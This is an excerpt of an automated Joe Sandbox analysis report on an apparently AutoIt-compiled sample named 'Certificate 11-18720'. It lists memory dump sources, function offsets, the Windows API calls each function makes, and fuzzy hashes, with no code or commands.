                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: e8f01d7c3bde479ee4a1701f30bd230885986f963cea3486619af16e0fe8fbb8
                                                                                    • Instruction ID: d5910075b7cfe1beb28276f0aabd70ea460a530edd42b9ac9e95cfead5dab68f
                                                                                    • Opcode Fuzzy Hash: e8f01d7c3bde479ee4a1701f30bd230885986f963cea3486619af16e0fe8fbb8
                                                                                    • Instruction Fuzzy Hash: 14115A7A900218FFEF11DFA8C985EADBBB5FB08700F204091E604B7290D771AE10DB94
                                                                                    APIs
                                                                                      • Part of subcall function 005DB34E: GetWindowLongW.USER32(?,000000EB), ref: 005DB35F
                                                                                    • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 005DB5A5
                                                                                    • GetClientRect.USER32(?,?), ref: 0063E69A
                                                                                    • GetCursorPos.USER32(?), ref: 0063E6A4
                                                                                    • ScreenToClient.USER32(?,?), ref: 0063E6AF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                                    • String ID:
                                                                                    • API String ID: 4127811313-0
                                                                                    • Opcode ID: 2ccc299e53f19b8d271d9dc420ce9de5384c27012156951963cbcf0317fbfd01
                                                                                    • Instruction ID: a48897dbe56b5fd1d14a02d319afa5bf28ff017590286f9c72bffff16ac37fd1
                                                                                    • Opcode Fuzzy Hash: 2ccc299e53f19b8d271d9dc420ce9de5384c27012156951963cbcf0317fbfd01
                                                                                    • Instruction Fuzzy Hash: A7113A3590002AFBDF10DF58D84A8EE7BBAFB4A304F010456F941E7240E730AA91CBA1
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00607352
                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00607385
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0060739B
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 006073A2
                                                                                    Similarity
                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 2880819207-0
                                                                                    • Opcode ID: 4b7051e1ac0b0852681b3c8bbfd115c327294fc4dbebc9f3a1b4b892bd4c1925
                                                                                    • Instruction ID: 20d1efcce1fff7fb47449851932a8e0dcf29cb87746821f1cc74ddda6be111cf
                                                                                    • Opcode Fuzzy Hash: 4b7051e1ac0b0852681b3c8bbfd115c327294fc4dbebc9f3a1b4b892bd4c1925
                                                                                    • Instruction Fuzzy Hash: 28110476E04214BFD71A9FA8DC09ADF7BAFAB46350F044355F921D33A1D6B09E0087A0
                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 005DD1BA
                                                                                    • GetStockObject.GDI32(00000011), ref: 005DD1CE
                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 005DD1D8
                                                                                    Similarity
                                                                                    • API ID: CreateMessageObjectSendStockWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3970641297-0
                                                                                    • Opcode ID: 2f8223531709120502c21e67095559f9d52a3adf0826df0cd9e97e7f4879d1a7
                                                                                    • Instruction ID: 7b2b46db99b9c7d767e1560908a917054746753d76da9e6cd6afe9fd1743dd50
                                                                                    • Opcode Fuzzy Hash: 2f8223531709120502c21e67095559f9d52a3adf0826df0cd9e97e7f4879d1a7
                                                                                    • Instruction Fuzzy Hash: 60118BB2501509BFEB224FA49C50EEABF7AFF0A3A4F040107FA1452250C7329C60DBA0
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                    • String ID:
                                                                                    • API String ID: 3016257755-0
                                                                                    • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                    • Instruction ID: c633fb8418c27327f26d95f17fc2621db0b2b00dd5057592c970f26712935a98
                                                                                    • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                    • Instruction Fuzzy Hash: A8014C3604014EBBCF125E88DC058EE3F6BBB58350B588855FF2859031D33ACAB1AF82
                                                                                    APIs
                                                                                      • Part of subcall function 005E7A0D: __getptd_noexit.LIBCMT ref: 005E7A0E
                                                                                    • __lock.LIBCMT ref: 005E748F
                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 005E74AC
                                                                                    • _free.LIBCMT ref: 005E74BF
                                                                                    • InterlockedIncrement.KERNEL32(00F151A8), ref: 005E74D7
                                                                                    Similarity
                                                                                    • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                    • String ID:
                                                                                    • API String ID: 2704283638-0
                                                                                    • Opcode ID: 73f9eb2e17057cee9a207e1769063418a2052c739f7f65706239c5a8e59f5a5f
                                                                                    • Instruction ID: 9aaceb76a08a62a587d11dc37eeb5854f3fbf855ba152d5326194a99d5fe62bd
                                                                                    • Opcode Fuzzy Hash: 73f9eb2e17057cee9a207e1769063418a2052c739f7f65706239c5a8e59f5a5f
                                                                                    • Instruction Fuzzy Hash: 0B010432905B6A97DB1EAF66950971DBF60BF88720F144005F498A76C0CB305940CFC2
                                                                                    APIs
                                                                                      • Part of subcall function 005DAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 005DAFE3
                                                                                      • Part of subcall function 005DAF83: SelectObject.GDI32(?,00000000), ref: 005DAFF2
                                                                                      • Part of subcall function 005DAF83: BeginPath.GDI32(?), ref: 005DB009
                                                                                      • Part of subcall function 005DAF83: SelectObject.GDI32(?,00000000), ref: 005DB033
                                                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0062EA8E
                                                                                    • LineTo.GDI32(00000000,?,?), ref: 0062EA9B
                                                                                    • EndPath.GDI32(00000000), ref: 0062EAAB
                                                                                    • StrokePath.GDI32(00000000), ref: 0062EAB9
                                                                                    Similarity
                                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                    • String ID:
                                                                                    • API String ID: 1539411459-0
                                                                                    • Opcode ID: eef0183d5505eeea99b2f0dae79194a7efdafbbd60632faad3ca774c2fe35c7a
                                                                                    • Instruction ID: edb928eb9d829fe3a7a438083d59ac98389edf91b1d51617ddb7823cfe8ff25c
                                                                                    • Opcode Fuzzy Hash: eef0183d5505eeea99b2f0dae79194a7efdafbbd60632faad3ca774c2fe35c7a
                                                                                    • Instruction Fuzzy Hash: 2EF0E235401269BBDB129FA4AC0EFCE3F1BAF07710F144202FE01661E183B55652CB99
                                                                                    APIs
                                                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 005FC84A
                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 005FC85D
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 005FC864
                                                                                    • AttachThreadInput.USER32(00000000), ref: 005FC86B
                                                                                    Similarity
                                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2710830443-0
                                                                                    • Opcode ID: fc607de9da3a6121605a4b7347416872df898071ecf98cb4dec70927ffcec2be
                                                                                    • Instruction ID: ff0d1880e74d0bcf2eef4e2a84865a1804b8965b2e9c9c525c8f5c5155e49280
                                                                                    • Opcode Fuzzy Hash: fc607de9da3a6121605a4b7347416872df898071ecf98cb4dec70927ffcec2be
                                                                                    • Instruction Fuzzy Hash: 82E06D7594122CBADB201BA2DC1DEEB7F1DEF067A1F008421BA0D95460C7B5C580CBE0
                                                                                    APIs
                                                                                    • GetCurrentThread.KERNEL32 ref: 005FB0D6
                                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,005FAC9D), ref: 005FB0DD
                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,005FAC9D), ref: 005FB0EA
                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,005FAC9D), ref: 005FB0F1
                                                                                    Similarity
                                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                                    • String ID:
                                                                                    • API String ID: 3974789173-0
                                                                                    • Opcode ID: b2eb54c8c248777ff1a5e028bdd48cc7dede4f75ec47060e2a7be8fda7b67a75
                                                                                    • Instruction ID: d365e8fe76b503f936f5aa6609a682ad7fc35e3ae52106963a16c61f754650aa
                                                                                    • Opcode Fuzzy Hash: b2eb54c8c248777ff1a5e028bdd48cc7dede4f75ec47060e2a7be8fda7b67a75
                                                                                    • Instruction Fuzzy Hash: F0E04F36B01211DBE7201FB19C0CB573BAEEF56B95F018818A641D6040DA3884018760
                                                                                    APIs
                                                                                    • GetSysColor.USER32(00000008), ref: 005DB496
                                                                                    • SetTextColor.GDI32(?,000000FF), ref: 005DB4A0
                                                                                    • SetBkMode.GDI32(?,00000001), ref: 005DB4B5
                                                                                    • GetStockObject.GDI32(00000005), ref: 005DB4BD
                                                                                    • GetWindowDC.USER32(?,00000000), ref: 0063DE2B
                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0063DE38
                                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 0063DE51
                                                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 0063DE6A
                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0063DE8A
                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0063DE95
                                                                                    Similarity
                                                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1946975507-0
                                                                                    • Opcode ID: 66140c2ab6e5dd2b67e8d500098a825fab761644947a48ecf8620f2dfb2badb8
                                                                                    • Instruction ID: 2dbe0ace71b304e7bc71dc6a74295e6149cb4a11b2b61c349132a189bd7acc02
                                                                                    • Opcode Fuzzy Hash: 66140c2ab6e5dd2b67e8d500098a825fab761644947a48ecf8620f2dfb2badb8
                                                                                    • Instruction Fuzzy Hash: ABE0ED35500280AAEF215B68BC09BD87F13AB57339F14D666FAAA580E2C7714581DB11
                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 005FB2DF
                                                                                    • UnloadUserProfile.USERENV(?,?), ref: 005FB2EB
                                                                                    • CloseHandle.KERNEL32(?), ref: 005FB2F4
                                                                                    • CloseHandle.KERNEL32(?), ref: 005FB2FC
                                                                                      • Part of subcall function 005FAB24: GetProcessHeap.KERNEL32(00000000,?,005FA848), ref: 005FAB2B
                                                                                      • Part of subcall function 005FAB24: HeapFree.KERNEL32(00000000), ref: 005FAB32
                                                                                    Similarity
                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                    • String ID:
                                                                                    • API String ID: 146765662-0
                                                                                    • Opcode ID: 9eb34056bdf812fba49b9d636679e05b1560a445d74611c3a69010c50d0b224a
                                                                                    • Instruction ID: 716e9ed4b22b35de70e44776e8f751374cf6884c60ffab205fd08c9e0a277568
                                                                                    • Opcode Fuzzy Hash: 9eb34056bdf812fba49b9d636679e05b1560a445d74611c3a69010c50d0b224a
                                                                                    • Instruction Fuzzy Hash: 5BE0B63A504006BBCB022FA5EC08859FFA7FF8A7613109221F62581575CB36A871EB91
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2889604237-0
                                                                                    • Opcode ID: 51f7ab0246ce471559032be5839777d49cd2667373e36de7e3bee01b6ceef5df
                                                                                    • Instruction ID: f562e33520a1d28a2959faaf021e0c38bab66ad3c65d5ff7655341d52f9ebbd5
                                                                                    • Opcode Fuzzy Hash: 51f7ab0246ce471559032be5839777d49cd2667373e36de7e3bee01b6ceef5df
                                                                                    • Instruction Fuzzy Hash: 5BE012B9900204EFDB015F708848A6E7FAAFB4D350F12A80AF95A8B210CA7498418B50
APIs
Memory Dump Source
• Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: 87b869488b410754c59029825c1422f0e6a8a6122dc3e2ee70ff5c35ac6f3dd5
• Instruction ID: aad3bb961045a0b372d5f6c60b828f5cbcfdfc82c737a390ab55825d1d6ea9c1
• Opcode Fuzzy Hash: 87b869488b410754c59029825c1422f0e6a8a6122dc3e2ee70ff5c35ac6f3dd5
• Instruction Fuzzy Hash: 92E046B9900200EFDB019F70C84C66D7FAAFB4D390F12A80AF95A8B320CB7998008F10
APIs
• OleSetContainedObject.OLE32(?,00000001), ref: 005FDEAA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
Similarity
• API ID: ContainedObject
• String ID: AutoIt3GUI$Container
• API String ID: 3565006973-3941886329
• Opcode ID: efd8b08b4a765ca8c6558007ee6b7f59972c0574f59f6484d4487e5f957261f1
• Instruction ID: ad8950eb7f8f8a93a20c49fd40fc1ccee8fc7766ae2333cacf4550d1490eaa65
• Opcode Fuzzy Hash: efd8b08b4a765ca8c6558007ee6b7f59972c0574f59f6484d4487e5f957261f1
• Instruction Fuzzy Hash: 90912A746006069FDB14DF64C884F6ABBBABF49710F10856EFA4ACF291DB74E841CB60
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
Similarity
• API ID: _wcscpy
• String ID: I/c$I/c
• API String ID: 3048848545-4062958339
• Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
• Instruction ID: 29f7efa74d57cbe5c7b6326fff6b6dabab5615703f9c2732faa71e6d2fa4e57f
• Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
• Instruction Fuzzy Hash: 9F41D535A40117AACF29DF99C469AFEBBB2FF48310F54505AE881A72D1DB705E82C790
APIs
• Sleep.KERNEL32(00000000), ref: 005DBCDA
• GlobalMemoryStatusEx.KERNEL32 ref: 005DBCF3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
• Opcode ID: 25eaf7a7a74c57977e112fba230a942bbc9c24154b0f84203416489e7efe83e7
• Instruction ID: 9a5dd8109d16fde21a1ae139aaf42bca7e67f100d0145d8f293b38c743739665
• Opcode Fuzzy Hash: 25eaf7a7a74c57977e112fba230a942bbc9c24154b0f84203416489e7efe83e7
• Instruction Fuzzy Hash: 73513A71418745ABE320AF14DC89BAFBBE8FFD4354F41484EF1C8422A6DB7089A88752
APIs
  • Part of subcall function 005C44ED: __fread_nolock.LIBCMT ref: 005C450B
• _wcscmp.LIBCMT ref: 0060C65D
• _wcscmp.LIBCMT ref: 0060C670
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
Similarity
• API ID: _wcscmp$__fread_nolock
• String ID: FILE
• API String ID: 4029003684-3121273764
• Opcode ID: 8ffc5b39964454013a2271f21af2ad1074f60816970617128efe7090e3ee85dc
• Instruction ID: 095fc8ecaba2a310b7a3c746c573d42e11b40408f64c18f4381c5bdb1e268a9c
• Opcode Fuzzy Hash: 8ffc5b39964454013a2271f21af2ad1074f60816970617128efe7090e3ee85dc
• Instruction Fuzzy Hash: 5141E572A4021ABEDF249BE48C85FEF7BBAAF89710F004469F605EB181D7719A048B55
APIs
• SendMessageW.USER32(?,00001132,00000000,?), ref: 0062A85A
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0062A86F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
Similarity
• API ID: MessageSend
• String ID: '
• API String ID: 3850602802-1997036262
• Opcode ID: f3c7173f07d726a5f31dec7bfddd4920da405cab065cfbc74c3f07d70df7da60
• Instruction ID: 9d557c8ad6dd5c33e56d1fb5fc504a3850ba5991f5ad6bab0a1dae3bdff3aa64
• Opcode Fuzzy Hash: f3c7173f07d726a5f31dec7bfddd4920da405cab065cfbc74c3f07d70df7da60
• Instruction Fuzzy Hash: 75411B78E017199FDB14CFA4D880BDA7BBAFB09300F10016AE905EB341D774A942CF95
APIs
• DestroyWindow.USER32(?,?,?,?), ref: 0062980E
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0062984A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
Similarity
• API ID: Window$DestroyMove
• String ID: static
• API String ID: 2139405536-2160076837
• Opcode ID: 31490107dc6fe10465304746f7e0e5bc6ef6ce9d9fc20ae3b0bac4ee3b24fad6
• Instruction ID: 186512924f3052e5cc103a87164d9ee0035599b5998019c906906966a34ce743
• Opcode Fuzzy Hash: 31490107dc6fe10465304746f7e0e5bc6ef6ce9d9fc20ae3b0bac4ee3b24fad6
• Instruction Fuzzy Hash: F331A471110614AEDB109F78DC80BFB77AAFF99750F04861AF8A9C7250C635AC41CB60
APIs
• _memset.LIBCMT ref: 006051C6
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00605201
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
• Opcode ID: 69c591e672a163ec44969582671e1055c22368a800844eda87c16b8f88cc2e9b
• Instruction ID: 97c23f1a86946372121004bc6fe6c8202135191eff01f97e200f042c728534cd
• Opcode Fuzzy Hash: 69c591e672a163ec44969582671e1055c22368a800844eda87c16b8f88cc2e9b
• Instruction Fuzzy Hash: 9E318131A40605EBEB28CF99D845BDFBBBAAF45350F144419E986A62E0D7709A44CF10
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
Similarity
• API ID: __snwprintf
• String ID: , $$AUTOITCALLVARIABLE%d
• API String ID: 2391506597-2584243854
• Opcode ID: e86679bcc9bf75623ef5fb7c11f9a1802210e21e3897633d62d07aff7c279462
• Instruction ID: 5cc91418111e3b514ca829c7840b35dbf9e3eb5ea5ecefedfa318ce8f10a282a
• Opcode Fuzzy Hash: e86679bcc9bf75623ef5fb7c11f9a1802210e21e3897633d62d07aff7c279462
• Instruction Fuzzy Hash: D5218435600119AFCF10EFA4C885FEE7BB6BF85300F054459F505AB251DB70EA85DBA6
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0062945C
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00629467
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
• Opcode ID: 54a3d1854c0e16c7fcf25317f1155ff0612bde9cdefb5323c46bddf3605f3751
• Instruction ID: b446e9157bc15ee65e8e1a9cc9cc6933e0ebfccd5ffa6751152f870a9397014c
• Opcode Fuzzy Hash: 54a3d1854c0e16c7fcf25317f1155ff0612bde9cdefb5323c46bddf3605f3751
• Instruction Fuzzy Hash: A0119371300519BFEF15DE54EC80EEB37AFEB893A4F104125F9199B290D6319C528B70
                                                                                    APIs
                                                                                      • Part of subcall function 005DB34E: GetWindowLongW.USER32(?,000000EB), ref: 005DB35F
                                                                                    • GetActiveWindow.USER32 ref: 0062DA7B
                                                                                    • EnumChildWindows.USER32(?,0062D75F,00000000), ref: 0062DAF5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ActiveChildEnumLongWindows
                                                                                    • String ID: T1a
                                                                                    • API String ID: 3814560230-1746667778
                                                                                    • Opcode ID: 63ac2586d76317000c446fcc74359313162fcca306146409572421a7c83496ee
                                                                                    • Instruction ID: 772a52918b1b50b5b29ec8a944b37829234b13a2d8bbaaea0900096771ac410d
                                                                                    • Opcode Fuzzy Hash: 63ac2586d76317000c446fcc74359313162fcca306146409572421a7c83496ee
                                                                                    • Instruction Fuzzy Hash: D8211D75204611DFCB24DF28E854AA577EBFF9A321F250719E9A58B3E0E730A841CF50
                                                                                    APIs
                                                                                      • Part of subcall function 005DD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 005DD1BA
                                                                                      • Part of subcall function 005DD17C: GetStockObject.GDI32(00000011), ref: 005DD1CE
                                                                                      • Part of subcall function 005DD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 005DD1D8
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00629968
                                                                                    • GetSysColor.USER32(00000012), ref: 00629982
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
